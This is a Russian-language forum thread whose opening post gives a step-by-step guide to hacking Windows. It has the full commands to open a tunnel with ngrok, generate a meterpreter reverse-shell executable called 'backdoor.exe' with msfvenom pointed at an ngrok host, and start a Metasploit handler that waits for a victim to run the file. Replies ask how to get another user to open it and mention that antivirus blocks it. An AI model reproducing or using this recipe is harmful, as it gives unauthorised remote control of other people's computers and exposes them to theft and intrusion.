Загрузка...

Hacking Windows with Metasploit on Kali Linux

Thread in Kali Linux created by PhtoNap26 Dec 16, 2021. (bumped Dec 16, 2021) 2796 views

  1. PhtoNap26
    PhtoNap26 Topic starter Dec 16, 2021 1 Dec 9, 2021
    Все на самом деле очень просто!

    -----------------------------------------------


    Вот что нужно:
    Kali Linux(в нем уже должен быть установлен Metasploit)
    Ngrok(ngrok будет использоваться для открытия портов)

    -----------------------------------------------

    Для начала мы открываем порты в ngrok


    Для этого в терминале прописываем: ./ngrok tcp (и порт который хотите открыть например:432)
    После нажатия Enter выводится вот такое окно:
    [IMG]
    Это означает что мы открыли порт!
    (ЕСЛИ ЭТО ОКНО ЗАКРЫТЬ ТО ПОРТ ЗАКРОЕТСЯ И НЕЧЕГО НЕ БУДЕТ РАБОТАТЬ)


    -----------------------------------------------

    Открываем ещё терминал и прописываем туда:msfconsole
    Происходит загрузка Metasploita, после загрузки должно быть такое окно:
    [IMG]

    Оно означает что Metasoploit открылся!
    Необходимо свернуть окно с метослоитом!

    -----------------------------------------------

    Дальше открываем новую вкладку с терминалом и прописываем там следующую команду для создания Metasploita:msfvenom -p windows/meterpreter/reverse_tcp lhost=6.tcp.ngrok.io lport=11630 -f exe -o backdoor.exe
    И так для начало разберём в что надо поменять в этой команде
    где написано lhost=6.tcp.ngrok.io надо поменять цифру 6 на ту которую вам выдал ngrok у меня это цифра 6
    а где написано lport=11630 надо написать тот порт который выдал нам ngrok в моем случае это 14016

    Все это на скриншоте!

    И так меняем это все на свои цифры

    Теперь получается вот такая строка:msfvenom -p windows/meterpreter/reverse_tcp lhost=6.tcp.ngrok.io lport=14016 -f exe -o backdoor.exe
    (Кстати в конце где написано backdoor.exe это название его можно поменять!)
    Нажимаем Enter
    После этого должно появится это:
    [IMG]

    Мы только что сделали Metosploit он сохраняется в папку root
    Но он ещё не готов!

    -----------------------------------------------

    И так его нужно настроить
    Открываем терминал где был запущен Metasploit

    И прописываем там следующие команды:
    use multi/handler
    Потом
    set payload windows/meterpreter/reverse_tcp
    Дальше
    set LHOST localhost

    (несмотря на то-что там написано localhost все ровно можно будет подключать из любой точки мира!)
    Продолжаем
    set LPORT 443(здесь вместо порта 443 пишем порт который вы вводили при открытии портов, в моем случае 432!)

    -----------------------------------------------

    Все мы его настроили!
    Но чтобы начать взлом или проверки безопасности) надо прописать команду exploit!
    И все Metasploit будет ждать пока кто-нибудь откроет ваш Metasploit!
    [IMG]
    Вот и все готово, надеюсь кому-то надо и помогло!
    Всем спасибо кто прочитал эту статью!:flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot:



     
  2. XYX_inactive
    а как октрыть метасплоит другому юзеру?
     
  3. MacMen
    Хорошая тема, но кажется что капипаста взятая с другого борта
     
  4. RSPARKER
    RSPARKER Jan 16, 2022 2228 Feb 19, 2018
    Оформление читабельно. Но немного бы ясностей внести в тему. Как должен запустится метасплоит и тд.
     
  5. Vova906
    Vova906 Feb 13, 2022 0 Mar 24, 2021
    антивирус 10 винды говорит (иди гуляй)
     
Loading...
Top